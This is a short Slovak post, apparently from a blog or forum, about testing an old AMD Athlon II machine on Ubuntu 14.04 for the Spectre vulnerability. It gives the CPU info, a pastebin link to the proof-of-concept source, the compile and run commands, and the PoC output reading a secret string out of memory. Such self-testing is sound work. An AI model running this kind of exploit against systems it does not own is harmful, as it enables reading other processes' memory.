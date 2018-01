×

Spectre na AMD

cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 16 model : 6 model name : AMD Athlon(tm) II P320 Dual-Core Processor stepping : 3 microcode : 0x10000c8 cpu MHz : 1500.000 cache size : 512 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc nonstop_tsc extd_apicid pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a 3dnowprefetch osvw ibs skinit wdt nodeid_msr hw_pstate npt lbrv svm_lock nrip_save vmmcall bogomips : 4189.41 clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical, 48 bits virtual power management: ts ttp tm stc 100mhzsteps hwpstate - uložíme zdroják do súboru spectre.c ------------------------------------- https://pastebin.com/raw/R48nqKqg - skompilujeme -------------- gcc -march=pentium4 -std=c99 -O0 spectre.c -o spectre - spustíme v konzole -------------------- ./spectre Reading 40 bytes: Reading at malicious_x = 0xffffe970... Success: 0x54=’T’ score=7 (second best: 0xD7 score=1) Reading at malicious_x = 0xffffe971... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffe972... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffe973... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffe974... Success: 0x4D=’M’ score=2 Reading at malicious_x = 0xffffe975... Success: 0x61=’a’ score=7 (second best: 0x8F score=1) Reading at malicious_x = 0xffffe976... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffe977... Success: 0x69=’i’ score=7 (second best: 0xFC score=1) Reading at malicious_x = 0xffffe978... Success: 0x63=’c’ score=2 Reading at malicious_x = 0xffffe979... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffe97a... Success: 0x57=’W’ score=7 (second best: 0xDF score=1) Reading at malicious_x = 0xffffe97b... Success: 0x6F=’o’ score=7 (second best: 0xA8 score=1) Reading at malicious_x = 0xffffe97c... Success: 0x72=’r’ score=7 (second best: 0xF9 score=1) Reading at malicious_x = 0xffffe97d... Success: 0x64=’d’ score=7 (second best: 0xDC score=1) Reading at malicious_x = 0xffffe97e... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffe97f... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffe980... Success: 0x61=’a’ score=7 (second best: 0xDD score=1) Reading at malicious_x = 0xffffe981... Success: 0x72=’r’ score=7 (second best: 0x75 score=1) Reading at malicious_x = 0xffffe982... Success: 0x65=’e’ score=7 (second best: 0x13 score=1) Reading at malicious_x = 0xffffe983... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffe984... Success: 0x53=’S’ score=7 (second best: 0xFE score=1) Reading at malicious_x = 0xffffe985... Success: 0x71=’q’ score=7 (second best: 0xCF score=1) Reading at malicious_x = 0xffffe986... Success: 0x75=’u’ score=2 Reading at malicious_x = 0xffffe987... Success: 0x65=’e’ score=7 (second best: 0xB8 score=1) Reading at malicious_x = 0xffffe988... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffe989... Success: 0x6D=’m’ score=7 (second best: 0xF7 score=1) Reading at malicious_x = 0xffffe98a... Success: 0x69=’i’ score=7 (second best: 0x9C score=1) Reading at malicious_x = 0xffffe98b... Success: 0x73=’s’ score=7 (second best: 0xCE score=1) Reading at malicious_x = 0xffffe98c... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffe98d... Success: 0x20=’ ’ score=7 (second best: 0xEF score=1) Reading at malicious_x = 0xffffe98e... Success: 0x4F=’O’ score=7 (second best: 0xE9 score=1) Reading at malicious_x = 0xffffe98f... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffe990... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffe991... Success: 0x69=’i’ score=7 (second best: 0xDE score=1) Reading at malicious_x = 0xffffe992... Success: 0x66=’f’ score=7 (second best: 0xF9 score=1) Reading at malicious_x = 0xffffe993... Success: 0x72=’r’ score=7 (second best: 0xB9 score=1) Reading at malicious_x = 0xffffe994... Success: 0x61=’a’ score=7 (second best: 0xCC score=1) Reading at malicious_x = 0xffffe995... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffe996... Success: 0x65=’e’ score=7 (second best: 0xF2 score=1) Reading at malicious_x = 0xffffe997... Success: 0x2E=’.’ score=7 (second best: 0xFC score=1)

Testovanie procesorov na zranitelnost Spectre.Mám tu starší procesor AMD s Ubuntu 14.04 LTS a ideme nato:

Obrázok dole je výstup z iného počítača nie z mojho.

